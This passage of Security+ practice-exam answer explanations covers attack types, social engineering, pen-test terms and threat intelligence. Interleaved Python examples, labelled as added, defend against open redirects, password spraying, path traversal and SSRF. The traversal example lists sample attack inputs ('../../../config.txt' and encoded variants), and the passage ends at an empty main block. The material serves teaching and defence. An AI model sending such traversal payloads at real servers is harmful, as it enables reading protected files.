103. B. Cross-site request forgery (XSRF or CSRF) sends forged requests to a website, supposedly from a trusted user. Cross-site scripting (XSS) is the injection of scripts into a website to exploit the users. A buffer overflow tries to put more data in a variable than the variable can hold. A remote-access Trojan (RAT) is malware that gives the attacker access to the system.
104. A. A denial-of-service (DoS) attack may target a memory leak. If an attacker can induce the web application to generate the memory leak, then eventually the web application will consume all memory on the web server and the web server will crash. Backdoors are not caused by memory leaks. SQL injection places malformed SQL into text boxes. A buffer overflow attempts to put more data in a variable than it can hold.
105. D. This is an example of an application distributed denial-of-service (DDoS) attack, aimed at a gaming application. A network DDoS would be aimed at network technology, either the devices or protocols that underlie networks. An operational technology (OT) DDoS targets SCADA, ICS, utility or similar operational systems. A GDoS was made up for this question.
106. D. Purple teams are a combination of red and blue teams intended to leverage the techniques and tools from both sides to improve organizational security. A red team is a team that tests security by using tools and techniques like an actual attacker. A blue team is a defender team that protects against attackers (and testers like red teams!). White teams oversee cybersecurity contests and judge events between red teams and blue teams.
107. B. This is an example of ransomware, which demands payment to return your data. A rootkit provides access to administrator/root privileges. A logic bomb executes its malicious activity when some condition is met. This scenario does not describe whaling.
108. D. If access is not handled properly, a time of check/time of use condition can exist where the memory is checked, changed, then used. Memory leaks occur when memory is allocated but not deallocated. A buffer overflow is when more data is put into a variable than it can hold. An integer overflow occurs when an attempt is made to put an integer that is too large into a variable, such as trying to put a 64-bit integer into a 32-bit variable.
109. B. Near-field communication (NFC) is susceptible to an attacker eavesdropping on the signal. Tailgating is a physical attack and not affected by NFC technology. Both IP spoofing and race conditions are unrelated to NFC technology.
110. B. Fileless viruses often take advantage of PowerShell to perform actions once they have used a vulnerability in a browser or browser plug-in to inject themselves into system memory. Rick’s best option from the list provided is to enable PowerShell logging and then to review the logs on systems he believes are infected. Since fileless viruses don’t use files, an image of the disk is unlikely to provide much useful data. Disabling the administrative user won’t have an impact, since the compromise will happen inside the account of whichever user is logged in and impacted by the malware. Crash dump files could have artifacts of the fileless virus if the machine crashed while it was active, but unless that occurs they will not have that information.
111. B. Tailgating involves simply following a legitimate user through the door once they have opened it, and it is a common means of exploiting a smartcard-based entry access system. It is simpler and usually easier than attempting to capture and clone a card. Phishing is unrelated to physical security. Although it is possible to generate a fake smartcard, it is a very uncommon attack. RFID spoofing can be accomplished but requires access to a valid RFID card and is relatively uncommon as well.
112. B. Adam should look for one or more threat feeds that match the type of information he is looking for. Open threat feeds exist that typically use STIX and TAXII to encode and transfer feed data to multiple tools in an open format. None of the other feed types here would meet Adam’s needs.
113. B. Malicious tools like BadUSB can make a USB cable or drive look like a keyboard when they are plugged in. Somewhat strangely, the Security+ exam outline focuses on malicious USB cables, but you should be aware that malicious thumb drives are far more common and have been used by penetration testers simply by dropping them in a parking lot near their intended target. A Trojan or a worm is a possibility, but the clue involving the keyboard would point to a USB device as the first place Naomi should look.
114. D. Using a pass-the-hash attack requires attackers to acquire a legitimate hash, and then present it to a server or service. A real hash was provided; it was not spoofed. An evil twin is a wireless attack. Shimming is inserting malicious code between an application and a library.
115. B. Claiming to be from tech support is claiming authority, and the story the caller gave indicates urgency. Yes, this caller used urgency (the virus spread) but did not attempt intimidation. Authority and trust are closely related, and in this case urgency was the second major factor.
116. B. The question tells us that these are Windows 10 systems, a current operating system. From there, it is safe to presume that something has gone wrong with the patching process or that there isn’t a patching process. Elaine should investigate both what the process is and if there are specific reasons the systems are not patched. Since we know these systems run a current OS, option A, unsupported operating systems, can be ruled out. The vulnerabilities are specifically noted to be Windows vulnerabilities, ruling out option C, and there is no mention of protocols, eliminating option D as well.
117. A. Address Resolution Protocol (ARP) poisoning, often called ARP spoofing, occurs when an attacker sends malicious ARP packets to the default gateway of a local area network, causing it to change the mappings it maintains between hardware (MAC) addresses and IP addresses. In DNS poisoning, domain name to IP address entries in a DNS server are altered. This attack did not involve an on-path attack. A backdoor provides access to the attacker, which circumvents normal authentication.
118. A. In a known environment (white-box) test, the tester is given extensive knowledge of the target network. Full disclosure is not a term used to describe testing. Unknown environment (black-box) testing involves only very minimal information being given to the tester. A red team test simulates a particular type of attacker, such as a nation-state attacker, an insider, or other type of attacker.
119. C. Social engineering is about using people skills to get information you would not otherwise have access to. Illegal copying of software isn’t social engineering, nor is gathering of discarded manuals and printouts, which describes dumpster diving. Phishing emails use some social engineering, but that is one example of social engineering, not a definition.
120. C. Shoulder surfing involves literally looking over someone’s shoulder in a public place and gathering information, perhaps login passwords. ARP poisoning alters the Address Resolution Protocol tables in the switch. Phishing is an attempt to gather information, often via email, or to convince a user to click a link to, and/or download, an attachment. A Smurf attack is a historical form of denial-of-service attack.
121. A. Invoice scams typically either send legitimate-appearing invoices to trick an organization into paying the fake invoice, or they focus on tricking employees into logging into a fake site to allow the acquisition of credentials. They typically do not focus on delivery of malware or stealing cryptocurrency.
122. B. Vulnerability scans use automated and semiautomated processes to identify known vulnerabilities. Audits usually involve document checks. Unknown and known environment testing are both types of penetration tests.
123. A. A partially known (gray-box) test involves the tester being given partial information about the network. A known environment (white-box) test involves the tester being given full or nearly full information about the target network, and unknown (black-box) environments don’t provide information about the target environment. Masked is not a testing term.
124. D. In the on-path (man-in-the-middle) attack, the attacker is between the client and the server, and to either end, the attacker appears like the legitimate other end. This does not describe any denial-of-service attack. A replay attack involves resending login information. Although an on-path attack can be used to perform eavesdropping, in this scenario the best answer is an on-path attack.
125. A. In a man-in-the-browser attack, the malware intercepts calls from the browser to the system, such as system libraries. On-path attack involves having some process between the two ends of communication in order to compromise passwords or cryptography keys. In a buffer overflow attack, more data is put into a variable than the variable was intended to hold. Session hijacking involves taking over an authenticated session.
126. B. Uniform resource locator (URL) redirection is frequently used in web applications to direct users to another service or portion of the site. If this redirection is not properly secured, it can be used to redirect to an arbitrary untrusted or malicious site. This issue, known as an open redirect vulnerability, remains quite common. The code shown does not contain SQL or LDAP code, and there is no mention of changing DNS information on the server, thus making the other options incorrect.
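The redirect handler in question 126 is not reproduced here, so the following is an added example rather than the book's code: the weak pattern (the `next` parameter becomes the Location header unchanged) next to a hardened version that only accepts same-origin paths. The origin `https://app.example.com` and the sample values are assumptions for this example.

```python
from urllib.parse import urljoin, urlparse

# Assumed for this example: the application's own origin. Anything that
# does not resolve to this scheme and host is refused.
SITE_BASE = "https://app.example.com"


def unsafe_redirect_target(next_param: str) -> str:
    """The open-redirect pattern: whatever arrived in ?next= is returned
    verbatim and would be sent as the Location header."""
    return next_param


def safe_redirect_target(next_param: str, default: str = "/") -> str:
    """Hardened version: resolve the value against our own origin and only
    keep it when the result is still on our origin; otherwise fall back to a
    fixed, known-safe path."""
    if not next_param:
        return default
    # Backslashes and CR/LF are rejected outright: browsers treat "/\host"
    # like "//host", and CR/LF would allow header injection in Location.
    if any(c in next_param for c in "\\\r\n"):
        return default
    # urljoin handles the usual tricks uniformly: absolute URLs, protocol-
    # relative "//evil.example/..." values, and foreign schemes such as
    # "javascript:" all resolve to something whose scheme/netloc differ.
    resolved = urlparse(urljoin(SITE_BASE, next_param))
    base = urlparse(SITE_BASE)
    if resolved.scheme != base.scheme or resolved.netloc != base.netloc:
        return default
    if not resolved.path.startswith("/"):
        return default
    # Emit a relative path, so the header can never name another host.
    target = resolved.path
    if resolved.query:
        target += "?" + resolved.query
    return target
```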
127. D. Placing a larger integer value into a smaller integer variable is an integer overflow. Memory overflow is not a term used, and memory leak is about allocating memory and not deallocating it. Buffer overflows often involve arrays. Variable overflow is not a term used in the industry.
128. B. Cross-site request forgery (XSRF or CSRF) takes advantage of the cookies and URL parameters legitimate sites use to help track and serve their visitors. In an XSRF or a CSRF attack, attackers leverage authorized, authenticated users’ rights by providing them with a cookie or session data that will be read and processed when they visit the target site. An attacker may embed a link within an email or other location that will be clicked or executed by the user or an automated process with that user’s session already open. This is not SQL injection, which would attempt to send commands to a database, or LDAP injection, which gathers data from a directory server. Cross-site scripting (XSS) would embed code in user-submittable data fields that a website will display to other users, causing it to run.
129. D. You will need to be able to read and understand basic scripts and programs in multiple languages for the Security+ exam. In this example, you can recognize common Bash syntax and see that it is adding a key to the authorized keys file for root. If that’s not an expected script, you should be worried!
130. D. Rootkits provide administrative access to systems, thus the “root” in rootkit. A Trojan horse combines malware with a legitimate program. A logic bomb performs its malicious activity when some condition is met. A multipartite virus infects the boot sector and a file.
131. C. Memory leaks can cause crashes, resulting in an outage. This targets the availability leg of the CIA (confidentiality, integrity, and availability) triad, making it a security issue. Memory leaks do not actually leak to other locations, nor do they allow code injection. Instead memory leaks cause memory exhaustion or other issues over time as memory is not properly reclaimed.
132. B. This question combines two pieces of knowledge: how botnet command and control works, and that IRC’s default port is TCP 6667. Although this could be one of the other answers, the most likely answer given the information available is a botnet that uses Internet Relay Chat (IRC) as its command-and-control channel.
133. A. Software updates for consumer-grade wireless routers are typically applied as firmware updates, and Susan should recommend that the business owner regularly upgrade their wireless router firmware. If updates are not available, they may need to purchase a new router that will continue to receive updates and configure it appropriately. This is not a default configuration issue nor an unsecured administrative account—neither is mentioned, nor is encryption.
134. B. Radio frequency identification (RFID) is commonly used for access badges, inventory systems, and even for identifying pets using implantable chips. In a penetration testing scenario, attackers are most likely to attempt to acquire or clone RFID-based access badges to gain admittance to a building or office suite.
135. B. The word you will need to know for the Security+ exam for phishing via SMS is “smishing,” a term that combines SMS and phishing. Bluejacking sends unsolicited messages to Bluetooth devices, and phone jacking and text whaling were made up for this question.
136. B. This is vishing, or using voice calls for phishing. Spear phishing is targeting a small, specific group. War dialing is dialing numbers hoping a computer modem answers. Robocalling is used to place unsolicited telemarketing calls.
137. A. Worms spread themselves via vulnerabilities, making this an example of a worm. A virus is software that self-replicates. A logic bomb executes its malicious activity when some condition is met. A Trojan horse combines malware with a legitimate program.
138. B. Dumpster diving is the process of going through the trash to find documents. Shredding documents will help to prevent dumpster diving, but truly dedicated dumpster divers can reassemble even well-shredded documents, leading some organizations to burn their most sensitive documents after they have been shredded. Phishing is often done via email or phone and is an attempt to elicit information or convince a user to click a link or open an attachment. Shoulder surfing is literally looking over someone’s shoulder. In the on-path (man-in-the-middle) attack, the attacker is between the client and the server, and to either end, the attacker appears like the legitimate other end.
139. B. Systems should not have a rootkit on them when a penetration test starts, and rootkits installed during the test should be fully removed and securely deleted. The rest of the options are all typical parts of a penetration testing cleanup process. You can read more at the penetration testing standard site at www.pentest-standard.org/index.php/Post_Exploitation.
140. C. This is an example of an online brute-force dictionary attack. Dictionary attacks use common passwords as well as common substitutions to attempt to break into a system or service. Back-off algorithms that lock out attackers after a small number of incorrect password attempts can help slow or stop dictionary attacks and other brute-force password attacks. Rainbow tables are tables of precomputed hashes. The birthday attack is a method for generating collisions of hashes. Finally, no spoofing is indicated in this scenario.
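Questions 91 and 140 both turn on how online password attacks look from the defender's side. This added example (not code from the book) replays constructed authentication log lines through the kind of back-off lockout question 140 describes, and then shows why the spraying pattern from question 91 (one or two guesses against many accounts) never trips a per-account lockout and has to be detected per source instead. The log format, thresholds, account names and addresses are all assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from any real system): 203.0.113.7 hammers one
# account with a word list; 198.51.100.9 tries one guess per account.
SAMPLE_LOG = """\
2024-05-01T10:00:01 FAIL user=alice src=203.0.113.7
2024-05-01T10:00:02 FAIL user=alice src=203.0.113.7
2024-05-01T10:00:03 FAIL user=alice src=203.0.113.7
2024-05-01T10:00:04 FAIL user=alice src=203.0.113.7
2024-05-01T10:00:05 FAIL user=alice src=203.0.113.7
2024-05-01T10:00:06 FAIL user=alice src=203.0.113.7
2024-05-01T10:05:00 FAIL user=bob src=198.51.100.9
2024-05-01T10:05:01 FAIL user=carol src=198.51.100.9
2024-05-01T10:05:02 FAIL user=dave src=198.51.100.9
2024-05-01T10:05:03 FAIL user=erin src=198.51.100.9
2024-05-01T10:05:04 FAIL user=frank src=198.51.100.9
2024-05-01T10:05:05 FAIL user=grace src=198.51.100.9
2024-05-01T10:06:00 OK   user=bob src=192.0.2.44
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<result>FAIL|OK)\s+user=(?P<user>\S+)\s+src=(?P<src>\S+)$"
)


def parse_log(text):
    """Turn the constructed log format into event dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "ok": m["result"] == "OK",
            "user": m["user"],
            "src": m["src"],
        })
    return events


class BackoffLockout:
    """Per-account lockout with exponential back-off: after `threshold`
    consecutive failures the account is locked for `base_lock` seconds, and
    every further lockout doubles the duration."""

    def __init__(self, threshold=3, base_lock=30):
        self.threshold = threshold
        self.base_lock = base_lock
        self.failures = defaultdict(int)   # consecutive failures per account
        self.lockouts = defaultdict(int)   # how many times each account locked
        self.locked_until = {}

    def is_locked(self, user, ts):
        until = self.locked_until.get(user)
        return until is not None and ts < until

    def record(self, user, ok, ts):
        """Returns 'locked', 'allowed' or 'lockout_triggered' for this attempt."""
        if self.is_locked(user, ts):
            return "locked"
        if ok:
            self.failures[user] = 0
            return "allowed"
        self.failures[user] += 1
        if self.failures[user] >= self.threshold:
            self.lockouts[user] += 1
            duration = self.base_lock * 2 ** (self.lockouts[user] - 1)
            self.locked_until[user] = ts + timedelta(seconds=duration)
            self.failures[user] = 0
            return "lockout_triggered"
        return "allowed"


def replay_with_lockout(events, threshold=3, base_lock=30):
    """Feed parsed events through the lockout in order; returns (user, outcome) pairs."""
    guard = BackoffLockout(threshold, base_lock)
    return [(e["user"], guard.record(e["user"], e["ok"], e["ts"])) for e in events]


def detect_spraying(events, min_accounts=5, max_per_account=2):
    """Flag sources whose failures spread over many accounts with only a few
    attempts each: the per-account counter above never reaches its threshold
    for such traffic, so the signal only appears when grouped by source."""
    per_src = defaultdict(lambda: defaultdict(int))
    for e in events:
        if not e["ok"]:
            per_src[e["src"]][e["user"]] += 1
    flagged = [src for src, users in per_src.items()
               if len(users) >= min_accounts and max(users.values()) <= max_per_account]
    return sorted(flagged)
```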
141. C. Jim has discovered a skimmer, a device used for skimming attacks that capture credit and debit card information. Skimmers may be able to wirelessly upload the information they capture, or they may require attackers to retrieve data in person. Some skimmers include cameras to capture keypresses for PINs and other data. A replay attack would reuse credentials or other information to act like a legitimate user, a race condition occurs when the time of use and time of check of data can be exploited, and a card cloner would be used after cards were skimmed to duplicate them.
142. D. Active reconnaissance connects to the network using techniques such as port scanning. Both active and passive reconnaissance can be done manually or with tools. Black-box and white-box refer to the amount of information the tester is given. Attackers and testers use both types of reconnaissance.
143. D. Browser toolbars are sometimes examples of PUPs, or potentially unwanted programs like spyware or adware. A worm is a type of malware that spreads on its own by exploiting vulnerabilities on network-connected systems. Once it infects a system, it will typically scan for other vulnerable systems and continue to spread. A RAT is a remote-access Trojan, and a rootkit is used to gain and keep administrative access.
144. B. OSINT, or open source intelligence, is intelligence information obtained from public sources like search engines, websites, domain name registrars, and a host of other locations. OPSEC, or operational security, refers to habits such as not disclosing unnecessary information. STIX is the Structured Threat Intelligence Exchange protocol, and IntCon was made up for this question.
145. C. Watering hole attacks target groups by focusing on common shared behaviors like visiting specific websites. If attackers can compromise the site or deliver targeted attacks through it, they can then target that group. Watercooler, phishing net, and phish pond attacks were all made up for this question.
146. C. Although Structured Query Language (SQL) queries are often parameterized, Lightweight Directory Access Protocol (LDAP) security practices focus instead on user input validation and filtering of output to ensure that an excessive amount of data is not being returned in queries. As with all services, securely configuring LDAP services is one of the first protections that should be put in place.
147. B. Although it may sound dramatic, sites accessible via Tor or other tools that separate them from the rest of the Internet are sometimes called “the dark web.” The Security+ exam uses this term, so you need to be aware of it for the exam. The rest of the options were made up and may be almost as silly as calling a section of the Internet the dark web.
148. B. URL redirection has many legitimate uses, from redirecting traffic from no-longer-supported links to current replacements to URL shortening, but URL redirection was commonly used for phishing attacks. Modern browsers display the full, real URL, helping to limit the impact of this type of attack. Certificate expiration tracking is used to ensure that website certificates are current, but it does not prevent URL redirection attacks. JavaScript being enabled or disabling cookies is not helpful for this purpose either.
149. A. Vulnerabilities in cloud services require work on the part of the cloud service provider to remediate them. You can remediate most vulnerabilities in your own infrastructure yourself without a third party. Vulnerabilities in cloud services and local infrastructure can both be as severe and take as much time to remediate. Regardless of where your organization stores its data, your responsibility for it is likely the same!
150. C. Consumer wireless routers provide local administrative access via their default credentials. Although they recommend that you change the password (and sometimes the username for greater security), many installations result in an unsecured administrative account. The other answers are all common issues but not what is described in the question.
151. A. A red team is a team that tests security by using tools and techniques like an actual attacker. A blue team is a defender team that protects against attackers (and testers like red teams!). Purple teams are a combination of red and blue teams intended to leverage the techniques and tools from both sides to improve organizational security. White teams oversee cybersecurity contests and judge events between red teams and blue teams.
152. A. Directory traversal attacks attempt to exploit tools that can read directories and files by moving through the directory structure. The example would try to read the config.txt file three layers above the working directory of the web application itself. Adding common directory names or common filenames can allow attackers (or penetration testers) to read other files in accessible directories if they are not properly secured. The remainder of the options were made up for this question, although Slashdot is an actual website.
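As an added illustration (not code from the book), here is the check a web application can apply when mapping a requested URL path to a file, so that a request such as `../../../config.txt` cannot walk three layers above the document root. The web root `/srv/webapp/public` and the sample requests are constructed for this example; the check is purely lexical, so a deployment should additionally resolve symlinks (for instance with `os.path.realpath`) on the file it finally opens.

```python
import posixpath
from urllib.parse import unquote

# Assumed for this example: the only directory the application may serve from.
WEBROOT = "/srv/webapp/public"


def resolve_requested_path(webroot, requested):
    """Map a URL path onto the web root, refusing anything that escapes it.
    Returns (filesystem_path, None) when safe, or (None, reason) when refused."""
    # Decode percent-encoding exactly once. Decoding again would let a
    # double-encoded "%252e%252e" become ".." after the check has passed.
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None, "null byte in path"
    # Treat backslashes as separators so "..\\..\\" is normalized like "../../".
    decoded = decoded.replace("\\", "/")
    # Join to the root and collapse "." and ".." segments lexically.
    candidate = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    root = posixpath.normpath(webroot)
    # The result must be the root itself or something strictly inside it;
    # comparing with the trailing separator stops "/srv/webapp/public2" from
    # passing as a prefix match.
    if candidate != root and not candidate.startswith(root + "/"):
        return None, "escapes web root"
    return candidate, None


# Constructed requests exercising the check (not taken from any real log).
SAMPLE_REQUESTS = [
    "/images/logo.png",
    "../../../config.txt",
    "%2e%2e/%2e%2e/%2e%2e/config.txt",
    "..\\..\\..\\config.txt",
    "/docs/../index.html",
    "%252e%252e/config.txt",
    "/%00.txt",
]


def audit_requests(webroot, requests):
    """Run every request through the check; returns {request: 'ok' or reason}."""
    return {r: (resolve_requested_path(webroot, r)[1] or "ok") for r in requests}
```

Note that `/docs/../index.html` is accepted: the `..` stays inside the root, which is the behaviour a server needs, while the double-encoded form resolves to a harmless literal `%2e%2e` directory name rather than to a parent directory.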
153. A. Security orchestration, automation, and response (SOAR) services are designed to integrate with a broader range of both internal and external applications. Both security information and event management (SIEM) and SOAR systems typically include threat and vulnerability management tools, as well as security operations’ automation capabilities.
154. A. A known environment (white-box) test involves providing extensive information, as described in this scenario. A known environment test could be internal or external. This scenario describes the opposite of an unknown environment (black-box) test, which would involve zero knowledge. Finally, threat test is not a term used in penetration testing.
155. C. The Windows Security Account Manager (SAM) file and the /etc/shadow file for Linux systems both contain passwords and are popular targets for offline brute-force attacks.
156. C. An SSL stripping attack requires attackers to persuade a victim to send traffic through them via HTTP while continuing to send HTTPS encrypted traffic to the legitimate server by pretending to be the victim. This is not a brute-force attack, a Trojan attack would require malware, and a downgrade attack would try to move the encrypted session to a less secure encryption protocol.
157. C. The U.S. Trusted Foundry program is intended to prevent supply chain attacks by ensuring end-to-end supply chain security for important integrated circuits and electronics.
158. B. Threat maps like those found at threatmap.fortiguard.com and threatmap.checkpoint.com are visualizations of real-time or near real-time data gathered by vendors and other organizations that can help visualize major threats and aid in analysis of them. Pie charts may be done in real time via security information and event management (SIEM) or other systems, but note that no SIEM or other device was mentioned. A dark web tracker was made up for the question, and OSINT repositories wouldn’t show real-time data like this.
159. B. Bluesnarfing involves accessing data from a Bluetooth device when it is in range. Bluejacking involves sending unsolicited messages to Bluetooth devices when they are in range. Evil twin attacks use a rogue access point whose name is similar or identical to that of a legitimate access point. A RAT is a remote-access Trojan, and nothing in this scenario points to a RAT being the cause of the stolen data.
160. B. The rules of engagement for a penetration test typically include the type and scope of testing, client contact information and requirements for when the team should be notified, sensitive data handling requirements, and details of regular status meetings and reports.
161. C. This command starts a reverse shell connecting to example.com on port 8989 every hour. If you’re not familiar with cron, you should take a moment to read the basics of cron commands and what you can do with them—you can read a man page for cron at manpages.ubuntu.com/manpages/focal/man8/cron.8.html.
162. C. The penetration tester leveraged the principle of urgency and also used some elements of authority by claiming to be a senior member of the organization. They didn’t threaten or intimidate the help desk staff member and did not make something seem scarce, nor did they attempt to build trust with the staff member.
163. A. Proprietary, or closed threat, intelligence is threat intelligence that is not openly available. OSINT, or open source threat intelligence, is freely available. ELINT is a military term for electronic and signals intelligence. Corporate threat intelligence was made up for this question.
164. B. CompTIA defines “maneuver” in the context of threat hunting as how to think like a malicious user to help you identify potential indicators of compromise in your environment. Outside of the Security+ exam, this is not a commonly used term in normal security practice, although it does make an appearance in military usage. Since this term is not common outside of the Security+ exam, make sure you understand the CompTIA definition. Intelligence fusion adds multiple intelligence sources together, threat feeds are used to provide information about threats, and advisories and bulletins are often combined with threat feeds to understand new attacks, vulnerabilities, and other threat information.
165. B. Script kiddies are the least resourced of the common threat actors listed above. In general, they flow from nation-state actors as the most highly resourced, to organized crime, to hacktivists, to inside actors, and then to script kiddies as the least capable and least resourced actors. As with any scale like this, there is room for some variability between specific actors, but for the exam, you should track them in that order.
166. B. A SYN flood is a type of resource exhaustion attack and uses up all available sessions on the system it is aimed at. Although a SYN flood can be a DDoS, no mention was made of multiple source machines for the attack. No application was mentioned, and a SYN flood targets the TCP/IP stack on the system rather than an application. No vulnerability was mentioned, and none is required for a SYN flood, since it simply tries to overwhelm the target’s ability to handle the opened connections. Protections against SYN floods tend to focus on preventing opened connections from causing resource exhaustion and identifying and blocking abusive hosts.
167. A. Pretexting is a type of social engineering that involves using a false motive and lying to obtain information. Here, the penetration tester lied about their role and why they are calling (impersonation), and then built some trust with the user before asking for personal information. A watering hole attack leverages a website that the targeted users all use and places malware on it to achieve their purpose. Prepending is described by CompTIA as “adding an expression or a phrase,” and shoulder surfing involves looking over an individual’s shoulder or otherwise observing them entering sensitive information like passwords.
168. C. You may be familiar with the term wardriving, but warflying is increasingly common as drones have entered wide use. Although penetration testers are somewhat unlikely to fly a helicopter or airplane over a target site, inexpensive drones can provide useful insight into both physical security and wireless network coverage if equipped with the right hardware. Droning and aerial snooping were made up for this question, and AirSnarf is an old tool for capturing usernames and passwords on vulnerable wireless networks.
169. C. Many organizations have legacy platforms in place that cannot be patched or upgraded but that are still an important part of their business. Security professionals are often asked to suggest ways to secure the systems while leaving them operational. Common options include moving the devices to an isolated virtual LAN (VLAN), disconnecting the devices from the network and ensuring they are not plugged back in, and using a firewall or other security device to ensure that the legacy system is protected from attacks and cannot browse the Internet or perform other actions that could result in compromise.
170. B. According to the National Council of ISACs, information sharing and analysis centers, “Information Sharing and Analysis Centers (ISACs) help critical infrastructure owners and operators protect their facilities, personnel and customers from cyber and physical security threats and other hazards. ISACs collect, analyze and disseminate actionable threat information to their members and provide members with tools to mitigate risks and enhance resiliency.” IRTs are incident response teams, Feedburner is Google’s RSS feed management tool, and vertical threat feeds is not an industry term.
171. B. TCP port 23 is typically associated with Telnet, an unencrypted remote shell protocol. Since Telnet sends its authentication and other traffic in the clear (clear/plaintext), it should not be used, and Lucca should identify this as a configuration issue involving an insecure protocol.
172. B. Privilege escalation attacks focus on gaining additional privileges. In this case, Cameron used physical access to the system to modify it, allowing him to then conduct a privilege escalation attack as an unprivileged user. A Trojan would have required a file to act like it was desirable, a denial-of-service attack would have prevented access to a system or service, and swap files (or page files) are drive space used to contain the contents of memory when memory runs low. Swap files may contain sensitive data, but the term swap file attack is not commonly used.
173. C. Common attributes of threat actors that you should be able to describe and explain for the Security+ exam include whether they are internal or external threats, their level of sophistication or capability, their resources or funding, and their intent or motivation. The number of years of experience is difficult to determine for many threat actors and is not a direct way to gauge their capabilities, and is therefore not a common attribute that is used to assess them.
174. B. Although engaging domain experts is often encouraged, requiring third-party review of proprietary algorithms is not. Many machine learning algorithms are sensitive since they are part of an organization’s competitive advantage. Ensuring that data is secure and of sufficient quality, ensuring a secure development environment, and requiring change control are all common artificial intelligence (AI)/machine learning (ML) security practices.
175. A. White teams act as judges and provide oversight of cybersecurity exercises and competitions. Options B and C may remind you of white- and gray-box tests, but they’re only there to confuse you. Cybersecurity teams are usually referred to with colors like red, blue, and purple as the most common colors, as well as the white teams that the Security+ exam outline mentions. Defenders in an exercise are part of the blue team.
176. C. Bug bounties are increasingly common and can be quite lucrative. Bug bounty websites match vulnerability researchers with organizations that are willing to pay for information about issues with their software or services. Ransoms are sometimes demanded by attackers, but this is not a ransom since it was voluntarily paid as part of a reward system. A zero-day disclosure happens when a vulnerability is disclosed and the organization has not been previously informed and allowed to fix the issue. Finally, you might feel like $10,000 is a payday, but the term is not used as a technical term and doesn’t appear on the exam.
177. A. Linux privileges can be set numerically, and 777 sets user, group, and world to all have read, write, and execute access to the entire /etc directory. Setting permissions like this is a common workaround when permissions aren’t working but can expose data or make binaries executable by users who should not have access to them. When you set permissions for a system, remember to set them according to the rule of least privilege: only the permissions that are required for the role or task should be configured.
178. B. Footprinting is the process of gathering information about a computer system or network, and it can involve both active and passive techniques. Mapping, fingerprinting, and aggregation are not the correct or common terms for this practice.
179. C. When dial-up modems were in heavy use, hackers would conduct wardialing exercises to call many phone numbers to find modems that would answer. When wireless networks became the norm, the same type of language was used, leading to terms like warwalking, wardriving, and even warflying. The rest of the options were made up, but you should remember that the Security+ exam expects you to know about wardriving and warflying.
180. B. Lighting and utility systems, as well as SCADA, PLCs, CNC, scientific equipment and similar devices are types of operational technology. Since this is a distributed attack that results in a denial of service, it is a distributed denial-of-service (DDoS) attack. OT systems are often isolated or otherwise protected from remote network connections to prevent this type of attack since many OT devices do not have strong security controls or frequent updates. A SCADA overflow is not a term used in the industry, but network and application DDoS attacks do appear on the Security+ exam outline, and you will need to be able to differentiate them from this type of OT DDoS.
181. C. A false negative occurs with a vulnerability scanning system when a scan is run and an issue that exists is not identified. This can be because of a configuration option, a firewall, or other security setting or because the vulnerability scanner is otherwise unable to detect the issue. A missing vulnerability update might be a concern if the problem did not specifically state that the definitions are fully up-to-date. Unless the vulnerability is so new that there is no definition, a missing update shouldn’t be the issue. Silent patching refers to a patching technique that does not show messages to users that a patch is occurring. A false positive would have caused a vulnerability to show that was not actually there. This sometimes happens when a patch or fix is installed but the application does not change in a way that shows the change.
182. A. Refactoring a program by automated means can include adding additional text, comments, or nonfunctional operations to make the program have a different signature without changing its operations. This is typically not a manual operation due to the fact that antimalware tools can quickly find new versions. Instead, refactoring is done via a polymorphic or code mutation technique that changes the malware every time it is installed to help avoid signature-based systems.
183. B. Hybrid warfare is a relatively new term that describes the multipronged attacks conducted as part of a military or national strategy of political warfare that uses traditional, asymmetric, and cyberwarfare techniques along with influence methods to achieve goals.
184. C. This is an example of a hoax. Hoaxes are fake security threats and can consume both time and resources to combat. User awareness and good habits for validating potential hoaxes are both useful ways to prevent them from consuming more time and energy than they should. A phishing attempt would target credentials or other information, no identity information is mentioned for identity fraud here, and an invoice scam involves a fake or modified invoice.
185. B. This is an attempt to get the server to send a request to itself as part of an API call, and it is an example of server-side request forgery. A cross-site scripting attack would use the victim’s browser rather than a server-side request, as would a CSRF attack.
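One server-side check against the request described above, as an added example that is not from the book. The hostnames, the stand-in resolver table and the allowlist are constructed for the example; a real deployment must check every address the system resolver returns and pin the connection to it, since a name can be re-pointed at an internal address after the check.

```python
"""Added example (not from the book): refusing to fetch client-supplied URLs
that point back at the server itself or at internal address space, the class
of request the SSRF answer above describes.

FAKE_DNS and the hostnames in it are constructed so the example runs offline.
"""
import ipaddress
from typing import List, Optional, Set, Tuple
from urllib.parse import urlsplit

# Constructed stand-in for DNS (not real records).
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "metadata.internal": ["169.254.169.254"],      # cloud metadata style address
    "mixed.example.com": ["93.184.216.34", "10.0.0.5"],  # one public, one RFC 1918
}


def resolve(hostname: str) -> List[str]:
    """Hypothetical lookup against FAKE_DNS; real code uses the system resolver."""
    return FAKE_DNS.get(hostname.lower(), [])


def is_internal(address: str) -> bool:
    """True for loopback, RFC 1918 and other non-global ranges, link-local,
    multicast and reserved space; only globally routable addresses pass."""
    ip = ipaddress.ip_address(address)
    return (not ip.is_global) or ip.is_loopback or ip.is_link_local or ip.is_multicast


def ssrf_safe_target(url: str, allowed_hosts: Optional[Set[str]] = None) -> Tuple[bool, str]:
    """Decide whether a client-supplied URL may be fetched from the server side.

    Returns (ok, reason). Every address the host maps to must be external; an
    optional hostname allowlist tightens this further. A host that does not
    resolve is refused rather than passed through to a library that might
    accept some other encoding of an address.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False, f"host {host!r} not in allowlist"
    # A literal IP (v4 or bracketed v6) needs no resolution; otherwise check
    # every address the name maps to, not just the first.
    try:
        addresses = [str(ipaddress.ip_address(host))]
    except ValueError:
        addresses = resolve(host)
    if not addresses:
        return False, f"host {host!r} does not resolve"
    for addr in addresses:
        if is_internal(addr):
            return False, f"host {host!r} maps to internal address {addr}"
    return True, "ok"


if __name__ == "__main__":
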